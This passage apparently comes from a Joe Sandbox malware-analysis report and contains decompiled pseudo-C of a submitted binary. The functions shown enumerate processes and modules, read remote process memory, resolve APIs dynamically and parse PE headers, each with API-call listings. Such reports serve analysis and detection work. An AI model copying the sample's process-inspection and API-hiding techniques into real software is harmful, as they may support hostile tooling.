				void* _t227;

				_t214 = __eax;
				_t193 = 0;
				_t121 =  *((intOrPtr*)(__eax));
				_v16 = 0xc0000135;
				_v68 = 0;
				_v64 = 0xf6cd30;
				_v60 = 0;
				_v56 = __eax;
				_v32 = 0;
				_v8 = 1;
				_v48 = __eax;
				if(_t121 == 0) {
					if(E00F61D5F( &_v84, __eax) == 0) {
						L43:
						return _v16;
					}
					_t125 = _v72;
					_t215 =  *((intOrPtr*)(_t125 + 0x14));
					while(1) {
						_t216 = _t215 - 8;
						if(_t216 == _t125 + 0xc) {
							break;
						}
						if(_v8 == _t193) {
							break;
						}
						_v52 =  *((intOrPtr*)(_t216 + 0x18));
						_v44 =  *((intOrPtr*)(_t216 + 0x20));
						_t220 =  &_v52;
						_v36 = _t216 + 0x2c;
						E00F61CFA(_t220);
						_t132 = _a4(_t220, _a8);
						_t215 =  *((intOrPtr*)(_t216 + 8));
						_v8 = _t132;
						_t125 = _v72;
					}
					L42:
					_v16 = _t193;
					goto L43;
				}
				_t133 = _t121 - 1;
				if(_t133 == 0) {
					_v36 =  &_v28;
					_t136 = E00F61D5F( &_v84, __eax); // executed
					if(_t136 == 0) {
						goto L43;
					}
					_v68 =  &_v172;
					_v60 = _v72;
					_t141 = E00F61149( &_v68,  &_v60, 0x24); // executed
					_t227 = _t226 + 0xc;
					if(_t141 == 0) {
						goto L43;
					}
					_t143 = _v152 + 0xfffffff8;
					_t218 = _v72 + 0xc;
					while(_t143 != _t218) {
						if(_v8 == _t193) {
							goto L42;
						}
						_v60 = _t143;
						_v68 =  &_v136;
						_t146 = E00F61149( &_v68,  &_v60, 0x34); // executed
						_t227 = _t227 + 0xc;
						_v8 = _t146;
						if(_t146 != _t193) {
							_v52 = _v112;
							_v44 = _v104;
							_t150 = _v92;
							_v28 = _t150;
							_push(_t150 >> 0x10);
							_push(0x40);
							_v24 = _v88;
							_t154 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
							_v24 = _t154;
							if(_t154 != _t193) {
								_v68 = _t154;
								_v60 = _v88;
								_t159 = E00F61149( &_v68,  &_v60, _v26 & 0x0000ffff); // executed
								_t227 = _t227 + 0xc;
								if(_t159 != 0) {
									_t221 =  &_v52;
									E00F61CFA(_t221); // executed
									_v8 = _a4(_t221, _a8);
								}
								LocalFree(_v24);
							}
						}
						_t143 = _v128 + 0xfffffff8;
					}
					goto L42;
				}
				_t164 = _t133 - 1;
				if(_t164 == 0) {
					_v36 =  &_v28;
					_t201 = E00F61526( *((intOrPtr*)( *((intOrPtr*)(__eax + 4)))), 4);
					_v20 = _t201;
					if(_t201 == 0) {
						goto L43;
					}
					_v12 = 0;
					if( *_t201 <= 0) {
						goto L42;
					}
					_t45 = _t201 + 0xc; // 0xc
					_t194 = _t45;
					while(_v8 != 0) {
						_v52 =  *((intOrPtr*)(_t194 - 8));
						_v44 =  *_t194;
						_t173 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t214 + 4)))) + 4)) +  *((intOrPtr*)(_t194 + 0xc));
						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t214 + 4)))) + 4)) +  *((intOrPtr*)(_t194 + 0xc)) != 0) {
							RtlInitUnicodeString( &_v28, E00F63718(_t173 + 4, 0x5c) + 2);
							_t222 =  &_v52;
							E00F61CFA(_t222);
							_t181 = _a4(_t222, _a8);
							_t201 = _v20;
							_v8 = _t181;
						}
						_v12 = _v12 + 1;
						_t194 = _t194 + 0x6c;
						if(_v12 <  *_t201) {
							continue;
						} else {
							break;
						}
					}
					_t193 = 0;
					goto L42;
				}
				if(_t164 == 1) {
					_t183 = E00F618D9( &_v32, 0xb);
					_v16 = _t183;
					if(_t183 < 0) {
						goto L43;
					}
					_v36 =  &_v28;
					_t185 = _v32;
					_v12 = 0;
					if( *_t185 <= 0) {
						goto L43;
					}
					_v20 = 0xfffffff0;
					_v20 = _v20 - _t185;
					_t195 = _t185 + 0x10;
					while(_v8 != 0) {
						_v52 =  *((intOrPtr*)(_t195 - 4));
						_v44 =  *_t195;
						_t27 = _t185 + 0x20; // 0x100000010
						_t219 = ( *(_t195 + 0xe) & 0x0000ffff) + _v20 + _t195 + _t27;
						if(_t219 == 0) {
							L15:
							_v12 = _v12 + 1;
							_t195 = _t195 + 0x11c;
							if(_v12 <  *_t185) {
								continue;
							}
							goto L43;
						}
						_t186 = _t219;
						_t28 = _t186 + 1; // 0x100000011
						_t213 = _t28;
						do {
							_t211 =  *_t186;
							_t186 = _t186 + 1;
						} while (_t211 != 0);
						_t225 = E00F61FA9(_t219, _t186 - _t213);
						if(_t225 != 0) {
							RtlInitUnicodeString( &_v28, _t225);
							_v40 = _v40 & 0x00000000;
							_v8 = _a4( &_v52, _a8);
							LocalFree(_t225);
						}
						_t185 = _v32;
						goto L15;
					}
					goto L43;
				}
				_v16 = 0xc0000002;
				goto L43;
			}
































































    0x00f619fa
    0x00f619fe
    0x00f61a00
    0x00f61a02
    0x00f61a09
    0x00f61a0c
    0x00f61a13
    0x00f61a16
    0x00f61a19
    0x00f61a1c
    0x00f61a23
    0x00f61a26
    0x00f61caa
    0x00f61cf2
    0x00f61cf9
    0x00f61cf9
    0x00f61cac
    0x00f61caf
    0x00f61ce5
    0x00f61ce5
    0x00f61ced
    0x00000000
    0x00000000
    0x00f61cb7
    0x00000000
    0x00000000
    0x00f61cbc
    0x00f61cc2
    0x00f61cc8
    0x00f61ccb
    0x00f61cce
    0x00f61cd9
    0x00f61cdc
    0x00f61cdf
    0x00f61ce2
    0x00f61ce2
    0x00f61cef
    0x00f61cef
    0x00000000
    0x00f61cef
    0x00f61a2c
    0x00f61a2d
    0x00f61b91
    0x00f61b99
    0x00f61ba0
    0x00000000
    0x00000000
    0x00f61bac
    0x00f61bb2
    0x00f61bbf
    0x00f61bc4
    0x00f61bc9
    0x00000000
    0x00000000
    0x00f61bd8
    0x00f61bdb
    0x00f61c94
    0x00f61be6
    0x00000000
    0x00000000
    0x00f61bec
    0x00f61bff
    0x00f61c02
    0x00f61c07
    0x00f61c0a
    0x00f61c0f
    0x00f61c17
    0x00f61c1d
    0x00f61c20
    0x00f61c23
    0x00f61c29
    0x00f61c2a
    0x00f61c36
    0x00f61c46
    0x00f61c48
    0x00f61c4d
    0x00f61c4f
    0x00f61c55
    0x00f61c65
    0x00f61c6a
    0x00f61c6f
    0x00f61c71
    0x00f61c74
    0x00f61c82
    0x00f61c82
    0x00f61c88
    0x00f61c88
    0x00f61c4d
    0x00f61c91
    0x00f61c91
    0x00000000
    0x00f61c9c
    0x00f61a33
    0x00f61a34
    0x00f61aff
    0x00f61b0f
    0x00f61b11
    0x00f61b16
    0x00000000
    0x00000000
    0x00f61b1c
    0x00f61b21
    0x00000000
    0x00000000
    0x00f61b27
    0x00f61b27
    0x00f61b2a
    0x00f61b33
    0x00f61b38
    0x00f61b43
    0x00f61b46
    0x00f61b5d
    0x00f61b63
    0x00f61b66
    0x00f61b71
    0x00f61b74
    0x00f61b77
    0x00f61b77
    0x00f61b7a
    0x00f61b80
    0x00f61b85
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00f61b85
    0x00f61b87
    0x00000000
    0x00f61b87
    0x00f61a3b
    0x00f61a4e
    0x00f61a54
    0x00f61a59
    0x00000000
    0x00000000
    0x00f61a62
    0x00f61a65
    0x00f61a68
    0x00f61a6d
    0x00000000
    0x00000000
    0x00f61a73
    0x00f61a7a
    0x00f61a7d
    0x00f61a80
    0x00f61a8d
    0x00f61a92
    0x00f61a9e
    0x00f61a9e
    0x00f61aa4
    0x00f61ae7
    0x00f61ae7
    0x00f61aed
    0x00f61af5
    0x00000000
    0x00000000
    0x00000000
    0x00f61af7
    0x00f61aa6
    0x00f61aa8
    0x00f61aa8
    0x00f61aab
    0x00f61aab
    0x00f61aad
    0x00f61aae
    0x00f61abb
    0x00f61abf
    0x00f61ac6
    0x00f61acf
    0x00f61adb
    0x00f61ade
    0x00f61ade
    0x00f61ae4
    0x00000000
    0x00f61ae4
    0x00000000
    0x00f61a80
    0x00f61a3d
    0x00000000

    APIs
      • Part of subcall function 00F618D9: NtQuerySystemInformation.NTDLL(00000000,00000000,00000000,00000000,00000000,00F619B7,00000005), ref: 00F618EE
      • Part of subcall function 00F618D9: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00001000,?,00000000,00F619B7,00000005), ref: 00F6190B
      • Part of subcall function 00F618D9: GetProcAddress.KERNEL32(00000000,?,00000000,00F619B7,00000005), ref: 00F61912
      • Part of subcall function 00F618D9: NtQuerySystemInformation.NTDLL(?,00000000,00001000,00000000,?,00000000,00F619B7,00000005), ref: 00F61928
      • Part of subcall function 00F618D9: LocalFree.KERNEL32(?,?,00000000,00F619B7,00000005), ref: 00F61936
      • Part of subcall function 00F61FA9: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,0000000100000013,00F61ABB), ref: 00F61FC4
      • Part of subcall function 00F61FA9: GetProcAddress.KERNEL32(00000000), ref: 00F61FCB
    • RtlInitUnicodeString.NTDLL(?,00000000), ref: 00F61AC6
    • LocalFree.KERNEL32(00000000), ref: 00F61ADE
    • _wcsrchr.LIBCMT ref: 00F61B4E
    • RtlInitUnicodeString.NTDLL(?,-00000002), ref: 00F61B5D
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F61C39
    • GetProcAddress.KERNEL32(00000000), ref: 00F61C40
    • LocalFree.KERNEL32(?), ref: 00F61C88
      • Part of subcall function 00F61D5F: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,00F61CA8), ref: 00F61D7B
      • Part of subcall function 00F61D5F: NtQueryInformationProcess.NTDLL(00000000,?,?,00000018,?), ref: 00F61DA8
      • Part of subcall function 00F61D5F: RtlGetCurrentPeb.NTDLL ref: 00F61DDE
      • Part of subcall function 00F61CFA: LocalFree.KERNEL32(?,?,?,?,00F61CD3), ref: 00F61D19
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F61DF3, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 98
    C-Code - Quality: 84%
    			E00F61DF3(void** __eax, void** _a4) {
				long _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				char _v104;
				void* _t37;
				void* _t44;
				void* _t51;
				intOrPtr _t55;
				WCHAR* _t58;
				long _t64;
				intOrPtr* _t70;

				_t70 = __eax;
				_v24 =  &_v104;
				_v20 = 0xf6cd30;
				_v28 = 0xf6cd30;
				_v36 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v32 = 0;
				_v40 = 0;
				_t37 = E00F61149( &_v24, __eax, 0x40); // executed
				if(_t37 != 0 && _v104 == 0x5a4d) {
					_push(0x18);
					_push(0x40);
					_t58 = L"kernel32";
					_v40 =  *_t70 + _v44;
					_t44 =  *(GetProcAddress(GetModuleHandleW(_t58), "LocalAlloc"))();
					_v24 = _t44;
					if(_t44 != 0) {
						E00F61149( &_v24,  &_v40, 0x18); // executed
						_t64 = ((0 |  *((intOrPtr*)(_v24 + 4)) != 0x0000014c) - 0x00000001 & 0xfffffff0) + 0x108;
						_push(_t64);
						_push(0x40);
						_v12 = _t64;
						_t51 =  *(GetProcAddress(GetModuleHandleW(_t58), "LocalAlloc"))();
						_v32 = _t51;
						if(_t51 != 0) {
							_t55 = E00F61149( &_v32,  &_v40, _v12); // executed
							_v16 = _t55;
							if(_t55 == 0) {
								LocalFree(_v32);
							} else {
								 *_a4 = _v32;
							}
						}
						LocalFree(_v24);
					}
				}
				return _v16;
			}




















    0x00f61dfb
    0x00f61e00
    0x00f61e09
    0x00f61e0c
    0x00f61e16
    0x00f61e1e
    0x00f61e21
    0x00f61e24
    0x00f61e27
    0x00f61e31
    0x00f61e51
    0x00f61e53
    0x00f61e5a
    0x00f61e60
    0x00f61e6e
    0x00f61e70
    0x00f61e75
    0x00f61e81
    0x00f61e9e
    0x00f61ea4
    0x00f61ea5
    0x00f61ead
    0x00f61eb5
    0x00f61ebd
    0x00f61ec2
    0x00f61ecf
    0x00f61ed7
    0x00f61edc
    0x00f61eeb
    0x00f61ede
    0x00f61ee4
    0x00f61ee4
    0x00f61edc
    0x00f61ef0
    0x00f61ef0
    0x00f61e75
    0x00f61ef9

    APIs
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000018,?,?,00000000), ref: 00F61E63
    • GetProcAddress.KERNEL32(00000000), ref: 00F61E6C
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000109), ref: 00F61EB0
    • GetProcAddress.KERNEL32(00000000), ref: 00F61EB3
    • LocalFree.KERNEL32(?), ref: 00F61EEB
    • LocalFree.KERNEL32(?), ref: 00F61EF0
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F65661, Relevance: 10.7, APIs: 7, Instructions: 196
    C-Code - Quality: 78%
    			E00F65661() {
				intOrPtr* _v8;
				void** _v12;
				struct _STARTUPINFOW _v80;
				signed int _t61;
				void* _t62;
				long _t65;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				int _t72;
				signed int _t73;
				intOrPtr* _t74;
				void* _t77;
				long _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				int _t93;
				signed char _t98;
				void* _t108;
				signed int _t110;
				signed int* _t111;
				int _t112;
				void** _t115;
				void** _t120;
				signed int _t121;

				GetStartupInfoW( &_v80);
				_push(0x40);
				_t112 = 0x20;
				_push(_t112); // executed
				_t61 = E00F661C9(); // executed
				if(_t61 != 0) {
					_t2 = _t61 + 0x800; // 0x800
					 *0xf6cda0 = _t61;
					 *0xf6cd98 = _t112;
					__eflags = _t61 - _t2;
					if(_t61 >= _t2) {
						L5:
						__eflags = _v80.cbReserved2;
						if(_v80.cbReserved2 == 0) {
							L27:
							_t91 = 0;
							__eflags = 0;
							do {
								_t115 = (_t91 << 6) +  *0xf6cda0;
								_t62 =  *_t115;
								__eflags = _t62 - 0xffffffff;
								if(_t62 == 0xffffffff) {
									L31:
									_t115[1] = 0x81;
									__eflags = _t91;
									if(_t91 != 0) {
										_t50 = _t91 - 1; // -1
										asm("sbb eax, eax");
										_t65 =  ~_t50 + 0xfffffff5;
										__eflags = _t65;
									} else {
										_t65 = 0xfffffff6;
									}
									_t108 = GetStdHandle(_t65);
									__eflags = _t108 - 0xffffffff;
									if(_t108 == 0xffffffff) {
										L43:
										_t58 =  &(_t115[1]);
										 *_t58 = _t115[1] | 0x00000040;
										__eflags =  *_t58;
										 *_t115 = 0xfffffffe;
										goto L44;
									} else {
										__eflags = _t108;
										if(_t108 == 0) {
											goto L43;
										}
										_t69 = GetFileType(_t108); // executed
										__eflags = _t69;
										if(_t69 == 0) {
											goto L43;
										}
										_t70 = _t69 & 0x000000ff;
										 *_t115 = _t108;
										__eflags = _t70 - 2;
										if(_t70 != 2) {
											__eflags = _t70 - 3;
											if(_t70 == 3) {
												_t53 =  &(_t115[1]);
												 *_t53 = _t115[1] | 0x00000008;
												__eflags =  *_t53;
											}
										} else {
											_t115[1] = _t115[1] | 0x00000040;
										}
										_t55 =  &(_t115[3]); // -16174484
										_t72 = InitializeCriticalSectionAndSpinCount(_t55, 0xfa0);
										__eflags = _t72;
										if(_t72 == 0) {
											L48:
											_t68 = _t72 | 0xffffffff;
											L46:
											return _t68;
										} else {
											_t115[2] = _t115[2] + 1;
											goto L44;
										}
									}
								}
								__eflags = _t62 - 0xfffffffe;
								if(_t62 == 0xfffffffe) {
									goto L31;
								}
								_t115[1] = _t115[1] | 0x00000080;
								L44:
								_t91 = _t91 + 1;
								__eflags = _t91 - 3;
							} while (_t91 < 3);
							SetHandleCount( *0xf6cd98);
							_t68 = 0;
							__eflags = 0;
							goto L46;
						}
						_t73 = _v80.lpReserved2;
						__eflags = _t73;
						if(_t73 == 0) {
							goto L27;
						}
						_t93 =  *_t73;
						_t74 = _t73 + 4;
						_v8 = _t74;
						_v12 = _t74 + _t93;
						__eflags = _t93 - 0x800;
						if(_t93 >= 0x800) {
							_t93 = 0x800;
						}
						__eflags =  *0xf6cd98 - _t93; // 0x0
						if(__eflags >= 0) {
							L18:
							_t110 = 0;
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L27;
							} else {
								goto L19;
							}
							do {
								L19:
								_t77 =  *_v12;
								__eflags = _t77 - 0xffffffff;
								if(_t77 == 0xffffffff) {
									goto L26;
								}
								__eflags = _t77 - 0xfffffffe;
								if(_t77 == 0xfffffffe) {
									goto L26;
								}
								_t98 =  *_v8;
								__eflags = _t98 & 0x00000001;
								if((_t98 & 0x00000001) == 0) {
									goto L26;
								}
								__eflags = _t98 & 0x00000008;
								if((_t98 & 0x00000008) != 0) {
									L24:
									_t120 = ((_t110 & 0x0000001f) << 6) + 0xf6cda0[_t110 >> 5];
									 *_t120 =  *_v12;
									_t120[1] =  *_v8;
									_t40 =  &(_t120[3]); // 0xc
									_t72 = InitializeCriticalSectionAndSpinCount(_t40, 0xfa0);
									__eflags = _t72;
									if(_t72 == 0) {
										goto L48;
									}
									_t41 =  &(_t120[2]);
									 *_t41 = _t120[2] + 1;
									__eflags =  *_t41;
									goto L26;
								}
								_t85 = GetFileType(_t77);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L26;
								}
								goto L24;
								L26:
								_v12 =  &(_v12[1]);
								_t110 = _t110 + 1;
								_v8 = _v8 + 1;
								__eflags = _t110 - _t93;
							} while (_t110 < _t93);
							goto L27;
						} else {
							_t111 = 0xf6cda4;
							while(1) {
								_t86 = E00F661C9(0x20, 0x40);
								__eflags = _t86;
								if(_t86 == 0) {
									break;
								}
								 *0xf6cd98 =  *0xf6cd98 + 0x20;
								_t16 = _t86 + 0x800; // 0x800
								 *_t111 = _t86;
								__eflags = _t86 - _t16;
								if(_t86 >= _t16) {
									L15:
									_t111 =  &(_t111[1]);
									__eflags =  *0xf6cd98 - _t93; // 0x0
									if(__eflags < 0) {
										continue;
									}
									goto L18;
								}
								_t87 = _t86 + 5;
								__eflags = _t87;
								do {
									 *(_t87 - 5) =  *(_t87 - 5) | 0xffffffff;
									 *(_t87 + 3) =  *(_t87 + 3) & 0x00000000;
									 *(_t87 + 0x1f) =  *(_t87 + 0x1f) & 0x00000080;
									 *(_t87 + 0x33) =  *(_t87 + 0x33) & 0x00000000;
									 *((short*)(_t87 - 1)) = 0xa00;
									 *((short*)(_t87 + 0x20)) = 0xa0a;
									 *((char*)(_t87 + 0x2f)) = 0;
									_t87 = _t87 + 0x40;
									_t28 = _t87 - 5; // -74
									__eflags = _t28 -  *_t111 + 0x800;
								} while (_t28 <  *_t111 + 0x800);
								goto L15;
							}
							_t93 =  *0xf6cd98; // 0x0
							goto L18;
						}
					}
					_t88 = _t61 + 5;
					__eflags = _t88;
					do {
						 *(_t88 - 5) =  *(_t88 - 5) | 0xffffffff;
						 *((short*)(_t88 - 1)) = 0xa00;
						 *((intOrPtr*)(_t88 + 3)) = 0;
						 *((short*)(_t88 + 0x1f)) = 0xa00;
						 *((char*)(_t88 + 0x21)) = 0xa;
						 *((intOrPtr*)(_t88 + 0x33)) = 0;
						 *((char*)(_t88 + 0x2f)) = 0;
						_t121 =  *0xf6cda0; // 0x0
						_t88 = _t88 + 0x40;
						_t11 = _t88 - 5; // -74
						__eflags = _t11 - _t121 + 0x800;
					} while (_t11 < _t121 + 0x800);
					goto L5;
				}
				return _t61 | 0xffffffff;
			}






























    0x00f6566e
    0x00f65674
    0x00f65678
    0x00f65679
    0x00f6567a
    0x00f65685
    0x00f6568f
    0x00f65695
    0x00f6569a
    0x00f656a0
    0x00f656a2
    0x00f656da
    0x00f656dc
    0x00f656e0
    0x00f657f4
    0x00f657f4
    0x00f657f4
    0x00f657f6
    0x00f657fb
    0x00f65801
    0x00f65803
    0x00f65806
    0x00f65813
    0x00f65813
    0x00f65817
    0x00f65819
    0x00f65820
    0x00f65825
    0x00f65827
    0x00f65827
    0x00f6581b
    0x00f6581d
    0x00f6581d
    0x00f65831
    0x00f65833
    0x00f65836
    0x00f6587a
    0x00f6587a
    0x00f6587a
    0x00f6587a
    0x00f6587e
    0x00000000
    0x00f65838
    0x00f65838
    0x00f6583a
    0x00000000
    0x00000000
    0x00f6583d
    0x00f65843
    0x00f65845
    0x00000000
    0x00000000
    0x00f65847
    0x00f6584c
    0x00f6584e
    0x00f65851
    0x00f65859
    0x00f6585c
    0x00f6585e
    0x00f6585e
    0x00f6585e
    0x00f6585e
    0x00f65853
    0x00f65853
    0x00f65853
    0x00f65867
    0x00f6586b
    0x00f65871
    0x00f65873
    0x00f658a1
    0x00f658a1
    0x00f6589c
    0x00000000
    0x00f65875
    0x00f65875
    0x00000000
    0x00f65875
    0x00f65873
    0x00f65836
    0x00f65808
    0x00f6580b
    0x00000000
    0x00000000
    0x00f6580d
    0x00f65884
    0x00f65884
    0x00f65885
    0x00f65885
    0x00f65894
    0x00f6589a
    0x00f6589a
    0x00000000
    0x00f6589a
    0x00f656e6
    0x00f656e9
    0x00f656eb
    0x00000000
    0x00000000
    0x00f656f1
    0x00f656f3
    0x00f656f6
    0x00f65700
    0x00f65703
    0x00f65705
    0x00f65707
    0x00f65707
    0x00f65709
    0x00f6570f
    0x00f6577c
    0x00f6577c
    0x00f6577e
    0x00f65780
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00f65782
    0x00f65782
    0x00f65785
    0x00f65787
    0x00f6578a
    0x00000000
    0x00000000
    0x00f6578c
    0x00f6578f
    0x00000000
    0x00000000
    0x00f65794
    0x00f65796
    0x00f65799
    0x00000000
    0x00000000
    0x00f6579b
    0x00f6579e
    0x00f657ab
    0x00f657b8
    0x00f657c4
    0x00f657cb
    0x00f657d3
    0x00f657d7
    0x00f657dd
    0x00f657df
    0x00000000
    0x00000000
    0x00f657e5
    0x00f657e5
    0x00f657e5
    0x00000000
    0x00f657e5
    0x00f657a1
    0x00f657a7
    0x00f657a9
    0x00000000
    0x00000000
    0x00000000
    0x00f657e8
    0x00f657e8
    0x00f657ec
    0x00f657ed
    0x00f657f0
    0x00f657f0
    0x00000000
    0x00f65711
    0x00f65711
    0x00f65716
    0x00f6571a
    0x00f65721
    0x00f65723
    0x00000000
    0x00000000
    0x00f65725
    0x00f6572c
    0x00f65732
    0x00f65734
    0x00f65736
    0x00f65769
    0x00f65769
    0x00f6576c
    0x00f65772
    0x00000000
    0x00000000
    0x00000000
    0x00f65774
    0x00f65738
    0x00f65738
    0x00f6573b
    0x00f6573b
    0x00f6573f
    0x00f65743
    0x00f65747
    0x00f6574b
    0x00f65751
    0x00f65757
    0x00f6575d
    0x00f65762
    0x00f65765
    0x00f65765
    0x00000000
    0x00f6573b
    0x00f65776
    0x00000000
    0x00f65776
    0x00f6570f
    0x00f656a4
    0x00f656a4
    0x00f656a7
    0x00f656a7
    0x00f656ab
    0x00f656b1
    0x00f656b4
    0x00f656ba
    0x00f656be
    0x00f656c1
    0x00f656c4
    0x00f656ca
    0x00f656cd
    0x00f656d6
    0x00f656d6
    0x00000000
    0x00f656a7
    0x00000000

    APIs
    • GetStartupInfoW.KERNEL32(?), ref: 00F6566E
      • Part of subcall function 00F661C9: Sleep.KERNEL32(00000000), ref: 00F661F1
    • GetFileType.KERNEL32(?), ref: 00F657A1
    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 00F657D7
    • GetStdHandle.KERNEL32(-000000F6), ref: 00F6582B
    • GetFileType.KERNEL32(00000000), ref: 00F6583D
    • InitializeCriticalSectionAndSpinCount.KERNEL32(-00F6CD94,00000FA0), ref: 00F6586B
    • SetHandleCount.KERNEL32 ref: 00F65894
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F63A0B, Relevance: 10.6, APIs: 7, Instructions: 90
    C-Code - Quality: 54%
    			E00F63A0B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				void* _t20;
				void* _t23;
				void* _t24;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				void* _t48;
				void* _t52;
				intOrPtr _t56;
				void* _t57;

				_t49 = __edi;
				_t48 = __edx;
				_t37 = __ebx;
				_push(0x14);
				_push(0xf69dc8);
				E00F65910(__ebx, __edi, __esi);
				_t56 =  *0xf6cebc; // 0x0
				if(_t56 == 0) {
					__imp__HeapSetInformation(0, 1, 0, 0);
				}
				_t57 =  *0xf60000 - 0x5a4d; // 0x5a4d
				if(_t57 == 0) {
					_t16 =  *0xf6003c; // 0xe8
					__eflags =  *((intOrPtr*)(_t16 + 0xf60000)) - 0x4550;
					if( *((intOrPtr*)(_t16 + 0xf60000)) != 0x4550) {
						goto L3;
					} else {
						__eflags =  *((intOrPtr*)(_t16 + 0xf60018)) - 0x10b;
						if( *((intOrPtr*)(_t16 + 0xf60018)) != 0x10b) {
							goto L3;
						} else {
							__eflags =  *((intOrPtr*)(_t16 + 0xf60074)) - 0xe;
							if( *((intOrPtr*)(_t16 + 0xf60074)) <= 0xe) {
								goto L3;
							} else {
								__eflags =  *(_t16 + 0xf600e8);
								_t7 =  *(_t16 + 0xf600e8) != 0;
								__eflags = _t7;
								 *(_t52 - 0x1c) = 0 | _t7;
							}
						}
					}
				} else {
					L3:
					 *(_t52 - 0x1c) = 0;
				}
				if(E00F658F2() == 0) {
					E00F639E2(0x1c);
				}
				if(E00F6488C(_t37) == 0) {
					E00F639E2(0x10);
				}
				E00F658A6();
				 *((intOrPtr*)(_t52 - 4)) = 0;
				_t20 = E00F65661(); // executed
				_t60 = _t20;
				if(_t20 < 0) {
					_push(0x1b);
					E00F64FB3(_t48, _t60);
				}
				 *0xf6ceb8 = GetCommandLineW();
				 *0xf6bfc4 = E00F65609();
				_t23 = E00F6555B();
				_t61 = _t23;
				if(_t23 < 0) {
					_push(8);
					_t23 = E00F64FB3(_t48, _t61);
				}
				_t24 = E00F65329(_t23, _t37);
				_t62 = _t24;
				if(_t24 < 0) {
					_push(9);
					E00F64FB3(_t48, _t62);
				}
				_t25 = E00F64D92(_t49, 0, 1);
				_t63 = _t25;
				if(_t25 != 0) {
					_push(_t25);
					E00F64FB3(_t48, _t63);
				}
				_t26 =  *0xf6c018; // 0x0
				 *0xf6c01c = _t26;
				_push(_t26);
